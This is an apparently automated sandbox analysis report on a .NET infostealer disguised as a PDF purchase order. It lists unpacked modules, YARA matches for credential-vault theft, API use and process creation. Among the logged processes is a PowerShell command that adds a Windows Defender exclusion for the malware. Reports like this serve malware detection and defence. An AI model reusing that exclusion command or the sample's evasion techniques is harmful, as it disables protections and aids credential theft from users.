                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeCode function: 10_2_0183707010_2_01837070
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeCode function: 10_2_01830D9010_2_01830D90
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeCode function: 10_2_0183174010_2_01831740
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeCode function: 10_2_03281BF210_2_03281BF2
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeCode function: 10_2_03287D5810_2_03287D58
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeCode function: 10_2_0328001F10_2_0328001F
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeCode function: 10_2_0328004010_2_03280040
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeCode function: 10_2_0328AEB010_2_0328AEB0
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeCode function: 10_2_07F772F010_2_07F772F0
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeCode function: 10_2_07F7C22810_2_07F7C228
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeCode function: 10_2_07F7106010_2_07F71060
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeCode function: 10_2_07F77F2810_2_07F77F28
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeCode function: 10_2_07F73D5010_2_07F73D50
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeCode function: 10_2_07F7878810_2_07F78788
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeCode function: 10_2_07F7877B10_2_07F7877B
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeCode function: 10_2_07F7F57810_2_07F7F578
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeCode function: 10_2_07F7246010_2_07F72460
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeCode function: 10_2_07F7245010_2_07F72450
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeCode function: 10_2_07F782B110_2_07F782B1
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeCode function: 10_2_07F7F14010_2_07F7F140
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeCode function: 10_2_07F77F1810_2_07F77F18
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeCode function: 10_2_07F73EE310_2_07F73EE3
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeCode function: 10_2_07F70E4E10_2_07F70E4E
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeCode function: 10_2_07F70DF110_2_07F70DF1
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeCode function: 10_2_07F70D5710_2_07F70D57
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeCode function: 10_2_07F73D4210_2_07F73D42
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeCode function: 10_2_07F70D0D10_2_07F70D0D
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeCode function: 10_2_07F70CBB10_2_07F70CBB
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeCode function: 10_2_07F70AC210_2_07F70AC2
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeCode function: 10_2_07F709DD10_2_07F709DD
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeCode function: 10_2_07F7797810_2_07F77978
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeCode function: 10_2_07F7796710_2_07F77967
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeCode function: 10_2_07F7092410_2_07F70924
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeCode function: 10_2_07F7191210_2_07F71912
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeCode function: 10_2_07F7191810_2_07F71918
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeCode function: 10_2_07F7081510_2_07F70815
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeCode function: 11_2_02A8963811_2_02A89638
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeCode function: 11_2_02A84AA811_2_02A84AA8
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeCode function: 11_2_02A8C98011_2_02A8C980
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeCode function: 11_2_02A83E9011_2_02A83E90
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeCode function: 11_2_02A841D811_2_02A841D8
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeCode function: 11_2_0613044811_2_06130448
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeCode function: 11_2_06132D9811_2_06132D98
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeCode function: 11_2_061322B011_2_061322B0
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeCode function: 11_2_06137FA211_2_06137FA2
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeCode function: 11_2_06137FA811_2_06137FA8
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeCode function: 11_2_02A8CC6811_2_02A8CC68
                    Source: PO-2024)bekotas.pdf.exe, 00000000.00000002.2013203130.0000000000C9E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs PO-2024)bekotas.pdf.exe
                    Source: PO-2024)bekotas.pdf.exe, 00000000.00000002.2017590242.0000000005440000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameRT.dll. vs PO-2024)bekotas.pdf.exe
                    Source: PO-2024)bekotas.pdf.exe, 00000000.00000002.2018583918.000000000D370000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs PO-2024)bekotas.pdf.exe
                    Source: PO-2024)bekotas.pdf.exe, 00000000.00000002.2014871271.0000000003B19000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename24eacbb4-825a-4768-ad59-21c6c6ffb60d.exe4 vs PO-2024)bekotas.pdf.exe
                    Source: PO-2024)bekotas.pdf.exe, 00000000.00000002.2014482605.0000000002AB1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameRT.dll. vs PO-2024)bekotas.pdf.exe
                    Source: PO-2024)bekotas.pdf.exe, 00000000.00000002.2014482605.0000000002AB1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename24eacbb4-825a-4768-ad59-21c6c6ffb60d.exe4 vs PO-2024)bekotas.pdf.exe
                    Source: PO-2024)bekotas.pdf.exe, 00000005.00000002.4455043243.0000000000CF9000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: OriginalFilenameUNKNOWN_FILET vs PO-2024)bekotas.pdf.exe
                    Source: PO-2024)bekotas.pdf.exeBinary or memory string: OriginalFilenameumXx.exe> vs PO-2024)bekotas.pdf.exe
                    Source: PO-2024)bekotas.pdf.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: 6.2.ctsdvwT.exe.3fa9990.2.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 10.2.ctsdvwT.exe.4344c70.2.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 10.2.ctsdvwT.exe.42a9970.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 6.2.ctsdvwT.exe.4024710.5.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 8.2.ctsdvwT.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 10.2.ctsdvwT.exe.42a9970.3.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 6.2.ctsdvwT.exe.4024710.5.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 0.2.PO-2024)bekotas.pdf.exe.3b546c0.3.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 0.2.PO-2024)bekotas.pdf.exe.3b19aa0.5.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 6.2.ctsdvwT.exe.3fa9990.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 10.2.ctsdvwT.exe.4344c70.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 0.2.PO-2024)bekotas.pdf.exe.3b546c0.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 0.2.PO-2024)bekotas.pdf.exe.3b19aa0.5.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: PO-2024)bekotas.pdf.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: ctsdvwT.exe.5.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: 0.2.PO-2024)bekotas.pdf.exe.3b546c0.3.raw.unpack, ZTFEpdjP8zw.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.PO-2024)bekotas.pdf.exe.3b546c0.3.raw.unpack, WnRNxU.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.PO-2024)bekotas.pdf.exe.3b546c0.3.raw.unpack, 2njIk.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.PO-2024)bekotas.pdf.exe.3b546c0.3.raw.unpack, I5ElxL.csCryptographic APIs: 'CreateDecryptor', 'TransformBlock'
                    Source: 0.2.PO-2024)bekotas.pdf.exe.3b546c0.3.raw.unpack, QQSiOsa4hPS.csCryptographic APIs: 'CreateDecryptor'
                    Source: 0.2.PO-2024)bekotas.pdf.exe.3b546c0.3.raw.unpack, FdHU4eb83Z7.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.PO-2024)bekotas.pdf.exe.3b546c0.3.raw.unpack, 3VzYbXLJt4.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.PO-2024)bekotas.pdf.exe.3b546c0.3.raw.unpack, 3VzYbXLJt4.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.PO-2024)bekotas.pdf.exe.3b546c0.3.raw.unpack, 3VzYbXLJt4.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.PO-2024)bekotas.pdf.exe.3b546c0.3.raw.unpack, 3VzYbXLJt4.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.PO-2024)bekotas.pdf.exe.478e2a0.2.raw.unpack, JyYiKU6SlscMNsPmbd.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 0.2.PO-2024)bekotas.pdf.exe.4847ac0.4.raw.unpack, JyYiKU6SlscMNsPmbd.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 0.2.PO-2024)bekotas.pdf.exe.d370000.9.raw.unpack, JyYiKU6SlscMNsPmbd.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 0.2.PO-2024)bekotas.pdf.exe.4847ac0.4.raw.unpack, UOmCBgHViOwVNaPQBr.csSecurity API names: _0020.SetAccessControl
                    Source: 0.2.PO-2024)bekotas.pdf.exe.4847ac0.4.raw.unpack, UOmCBgHViOwVNaPQBr.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 0.2.PO-2024)bekotas.pdf.exe.4847ac0.4.raw.unpack, UOmCBgHViOwVNaPQBr.csSecurity API names: _0020.AddAccessRule
                    Source: 0.2.PO-2024)bekotas.pdf.exe.478e2a0.2.raw.unpack, UOmCBgHViOwVNaPQBr.csSecurity API names: _0020.SetAccessControl
                    Source: 0.2.PO-2024)bekotas.pdf.exe.478e2a0.2.raw.unpack, UOmCBgHViOwVNaPQBr.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 0.2.PO-2024)bekotas.pdf.exe.478e2a0.2.raw.unpack, UOmCBgHViOwVNaPQBr.csSecurity API names: _0020.AddAccessRule
                    Source: 0.2.PO-2024)bekotas.pdf.exe.d370000.9.raw.unpack, UOmCBgHViOwVNaPQBr.csSecurity API names: _0020.SetAccessControl
                    Source: 0.2.PO-2024)bekotas.pdf.exe.d370000.9.raw.unpack, UOmCBgHViOwVNaPQBr.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 0.2.PO-2024)bekotas.pdf.exe.d370000.9.raw.unpack, UOmCBgHViOwVNaPQBr.csSecurity API names: _0020.AddAccessRule
                    Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@14/7@1/1
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\PO-2024)bekotas.pdf.exe.logJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeMutant created: NULL
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeMutant created: \Sessions\1\BaseNamedObjects\HOjiqFZDFIAAWY
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6476:120:WilError_03
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0m3rxyww.oxh.ps1Jump to behavior
                    Source: PO-2024)bekotas.pdf.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: PO-2024)bekotas.pdf.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                    Source: PO-2024)bekotas.pdf.exe, 00000005.00000002.4459041571.0000000002B7B000.00000004.00000800.00020000.00000000.sdmp, PO-2024)bekotas.pdf.exe, 00000005.00000002.4459041571.0000000002B8E000.00000004.00000800.00020000.00000000.sdmp, ctsdvwT.exe, 00000008.00000002.2231602205.0000000002C7D000.00000004.00000800.00020000.00000000.sdmp, ctsdvwT.exe, 00000008.00000002.2231602205.0000000002C6A000.00000004.00000800.00020000.00000000.sdmp, ctsdvwT.exe, 0000000B.00000002.4457826484.0000000002CAA000.00000004.00000800.00020000.00000000.sdmp, ctsdvwT.exe, 0000000B.00000002.4457826484.0000000002CBD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                    Source: PO-2024)bekotas.pdf.exeReversingLabs: Detection: 23%
                    Source: PO-2024)bekotas.pdf.exeVirustotal: Detection: 32%
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exeFile read: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exeJump to behavior
                    Source: unknownProcess created: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exe "C:\Users\user\Desktop\PO-2024)bekotas.pdf.exe"
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PO-2024)bekotas.pdf.exe"
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exeProcess created: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exe "C:\Users\user\Desktop\PO-2024)bekotas.pdf.exe"
                    Source: unknownProcess created: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe "C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe"
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess created: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe "C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe"
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess created: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe "C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe"
                    Source: unknownProcess created: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe "C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe"
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess created: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe "C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe"
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PO-2024)bekotas.pdf.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exeProcess created: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exe "C:\Users\user\Desktop\PO-2024)bekotas.pdf.exe"Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess created: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe "C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe"Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess created: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe "C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe"Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeProcess created: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe "C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exeSection loaded: dwrite.dllJump to behavior
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exeSection loaded: windowscodecs.dllJump to behavior
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exeSection loaded: edputil.dllJump to behavior
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exeSection loaded: appresolver.dllJump to behavior
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exeSection loaded: bcp47langs.dllJump to behavior
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exeSection loaded: slc.dllJump to behavior
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exeSection loaded: sppc.dllJump to behavior
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\Desktop\PO-2024)bekotas.pdf.exeSection loaded: cryptbase.dllJump to behavior
